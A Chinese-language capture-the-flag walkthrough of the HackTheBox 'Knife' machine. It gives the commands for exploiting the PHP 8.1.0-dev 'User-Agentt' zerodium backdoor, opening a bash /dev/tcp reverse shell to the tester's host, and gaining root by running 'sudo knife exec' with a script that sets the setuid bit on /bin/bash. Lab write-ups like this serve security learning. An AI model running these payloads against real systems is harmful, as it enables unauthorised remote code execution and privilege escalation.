HackTheBox-Knife

Posted 2021-09-07 H3rmesk1t

HackTheBox-Knife

• 连接配置
• 渗透测试
• • 信息搜集
  • 漏洞挖掘
  • getshell
  • 提权

连接配置

• 参考之前的文章步骤配置 LAB ACCESS，文章链接

渗透测试

信息搜集

• 先用 Namp 扫描一下目标靶机，发现开放了 22、80 两个端口

sudo nmap 10.10.10.242

• 用 dirb 扫描网站发现没有什么有用信息

漏洞挖掘

联想到题目名字应该是存在后门，查看源码和抓包分析后发现存在 php/8.1.0-dev，该版本在2021年3月28日被植入后门，当服务器存在该后门时攻击者可以通过发送 User-Agentt 头来执行任意代码

• 使用 burpsuite 抓包，并加入字段 User-Agentt: zerodiumvar_dump(2*3);，发现被成功执行

getshell

• 起一个 nc 监听， 然后执行命令 User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/10.10.16.21/1234 0>&1'");，并将 shell 换成一个交互式的 shell

python3 -c 'import pyt;pty.spawn("/bin/bash")'
或者
SHELL=/bin/bash script -q /dev/null

• 查看用户 James 家目录下拿到 USER OWN 的 flag

提权

• 利用 sudo -l 进行提权，确定 knife 用户的 sudo 权限

sudo -l
ls /usr/bin/knife -al

• 执行命令，拿到 root 权限，在 root 目录下拿到 SYSTEM OWN 的 flag

echo "system('chmod +s /bin/bash')" > exploit.rb
sudo /usr/bin/knife exec exploit.rb
/bin/bash -p